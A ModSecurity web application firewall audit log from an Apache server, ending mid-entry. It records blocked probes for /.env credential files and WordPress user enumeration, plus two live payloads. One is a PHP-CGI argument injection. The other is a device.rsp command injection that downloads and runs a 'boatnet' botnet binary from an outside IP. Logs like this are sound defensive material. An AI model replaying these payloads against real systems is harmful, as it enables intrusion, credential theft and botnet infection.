Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4971e404-Z-- --01708033-A-- [15/Jun/2025:17:28:27 +0700] aE6gS_GguMGNwgSGIMxO9gAAAAA 103.236.140.4 51156 103.236.140.4 8181 --01708033-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36 Accept-Charset: utf-8 --01708033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01708033-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749983307689958 940 (- - -) Stopwatch2: 1749983307689958 940; combined=428, p1=385, p2=0, p3=0, p4=0, p5=43, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01708033-Z-- --5045fb69-A-- [15/Jun/2025:17:51:19 +0700] aE6lp_GguMGNwgSGIMxPCQAAAA0 103.236.140.4 51424 103.236.140.4 8181 --5045fb69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.78.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.78.73 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5045fb69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5045fb69-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749984679684372 781 (- - -) Stopwatch2: 1749984679684372 781; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5045fb69-Z-- --108f864f-A-- [15/Jun/2025:18:02:59 +0700] aE6oY_GguMGNwgSGIMxPFgAAABY 103.236.140.4 51568 103.236.140.4 8181 --108f864f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.178.172.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.178.172.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --108f864f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --108f864f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749985379574264 3257 (- - -) Stopwatch2: 1749985379574264 3257; combined=1463, p1=476, p2=956, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --108f864f-Z-- --a200a203-A-- [15/Jun/2025:18:35:50 +0700] aE6wFrr7GPil_2h-MzY0tQAAAME 103.236.140.4 60644 103.236.140.4 8181 --a200a203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.84.74.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.84.74.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a200a203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a200a203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749987350431387 2741 (- - -) Stopwatch2: 1749987350431387 2741; combined=1170, p1=408, p2=727, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a200a203-Z-- --c856db01-A-- [15/Jun/2025:19:01:09 +0700] aE62BT2YoubFl106kA3-dAAAAJA 103.236.140.4 33060 103.236.140.4 8181 --c856db01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.77.14.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.77.14.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c856db01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c856db01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749988869520032 2344 (- - -) Stopwatch2: 1749988869520032 2344; combined=1104, p1=356, p2=702, p3=0, p4=0, p5=45, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c856db01-Z-- --fad24265-A-- [15/Jun/2025:19:20:41 +0700] aE66mT2YoubFl106kA3-hQAAAIE 103.236.140.4 33132 103.236.140.4 8181 --fad24265-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.155.199 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept-Charset: utf-8 Cookie: X-Forwarded-For: 143.198.155.199 Accept-Encoding: gzip X-Varnish: 180665556 --fad24265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fad24265-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749990041862478 867 (- - -) Stopwatch2: 1749990041862478 867; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fad24265-Z-- --fdf14318-A-- [15/Jun/2025:19:25:23 +0700] aE67s_GguMGNwgSGIMxR-gAAABc 103.236.140.4 33140 103.236.140.4 8181 --fdf14318-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.133.213.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.133.213.86 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --fdf14318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf14318-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749990323842614 834 (- - -) Stopwatch2: 1749990323842614 834; combined=318, p1=271, p2=0, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf14318-Z-- --71a2b544-A-- [15/Jun/2025:19:46:25 +0700] aE7AoT2YoubFl106kA3-mwAAAIA 103.236.140.4 33198 103.236.140.4 8181 --71a2b544-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.130.38.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.130.38.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71a2b544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71a2b544-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749991585874391 3243 (- - -) Stopwatch2: 1749991585874391 3243; combined=1307, p1=453, p2=819, p3=0, p4=0, p5=35, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71a2b544-Z-- --d243f93b-A-- [15/Jun/2025:20:27:53 +0700] aE7KWT2YoubFl106kA3-xAAAAJM 103.236.140.4 33496 103.236.140.4 8181 --d243f93b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --d243f93b-C-- --d243f93b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d243f93b-E-- --d243f93b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749994073449346 4999 (- - -) Stopwatch2: 1749994073449346 4999; combined=2945, p1=524, p2=2382, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d243f93b-Z-- --addc2e2f-A-- [15/Jun/2025:20:48:13 +0700] aE7PHYZIfYpKBvn-jB754wAAAEI 103.236.140.4 33628 103.236.140.4 8181 --addc2e2f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.217.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.217.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --addc2e2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --addc2e2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749995293672491 2745 (- - -) Stopwatch2: 1749995293672491 2745; combined=1224, p1=412, p2=782, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --addc2e2f-Z-- --3e0e094a-A-- [15/Jun/2025:20:53:26 +0700] aE7QVrr7GPil_2h-MzY1VgAAANU 103.236.140.4 33694 103.236.140.4 8181 --3e0e094a-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; LG-D850 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.97 Mobile Safari/537.36 Accept-Charset: utf-8 --3e0e094a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e0e094a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749995606964118 790 (- - -) Stopwatch2: 1749995606964118 790; combined=330, p1=292, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e0e094a-Z-- --39a15443-A-- [15/Jun/2025:21:11:24 +0700] aE7UjLr7GPil_2h-MzY1cgAAANA 103.236.140.4 33888 103.236.140.4 8181 --39a15443-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 167.235.8.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 167.235.8.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --39a15443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a15443-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749996684554561 3117 (- - -) Stopwatch2: 1749996684554561 3117; combined=1348, p1=449, p2=871, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a15443-Z-- --81706b0a-A-- [15/Jun/2025:21:39:26 +0700] aE7bHrr7GPil_2h-MzY1ngAAAM4 103.236.140.4 34088 103.236.140.4 8181 --81706b0a-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 144.172.116.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.116.95 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 --81706b0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81706b0a-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749998366029262 1024 (- - -) Stopwatch2: 1749998366029262 1024; combined=431, p1=378, p2=0, p3=0, p4=0, p5=53, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81706b0a-Z-- --b185de1f-A-- [15/Jun/2025:21:50:54 +0700] aE7dzj2YoubFl106kA3_BwAAAIY 103.236.140.4 34180 103.236.140.4 8181 --b185de1f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b185de1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b185de1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749999054044857 850 (- - -) Stopwatch2: 1749999054044857 850; combined=372, p1=335, p2=0, p3=0, p4=0, p5=37, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b185de1f-Z-- --7ecdc47c-A-- [15/Jun/2025:21:50:57 +0700] aE7d0br7GPil_2h-MzY1rgAAANU 103.236.140.4 34182 103.236.140.4 8181 --7ecdc47c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7ecdc47c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ecdc47c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749999057086507 689 (- - -) Stopwatch2: 1749999057086507 689; combined=281, p1=251, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ecdc47c-Z-- --ecb7247c-A-- [15/Jun/2025:22:08:35 +0700] aE7h87r7GPil_2h-MzY1zgAAANE 103.236.140.4 34318 103.236.140.4 8181 --ecb7247c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.214.112.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.214.112.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ecb7247c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecb7247c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750000115560577 2703 (- - -) Stopwatch2: 1750000115560577 2703; combined=1256, p1=423, p2=803, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecb7247c-Z-- --8d5b6c3d-A-- [15/Jun/2025:22:36:02 +0700] aE7oYrr7GPil_2h-MzY18QAAANA 103.236.140.4 34510 103.236.140.4 8181 --8d5b6c3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.213.155.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.213.155.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* Accept-Language: en-US,en;q=0.5 --8d5b6c3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d5b6c3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750001762406935 4083 (- - -) Stopwatch2: 1750001762406935 4083; combined=1817, p1=530, p2=1235, p3=0, p4=0, p5=51, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d5b6c3d-Z-- --10acfc4f-A-- [15/Jun/2025:22:46:19 +0700] aE7qy7r7GPil_2h-MzY1_QAAAMc 103.236.140.4 34574 103.236.140.4 8181 --10acfc4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 169.255.137.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 169.255.137.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --10acfc4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10acfc4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 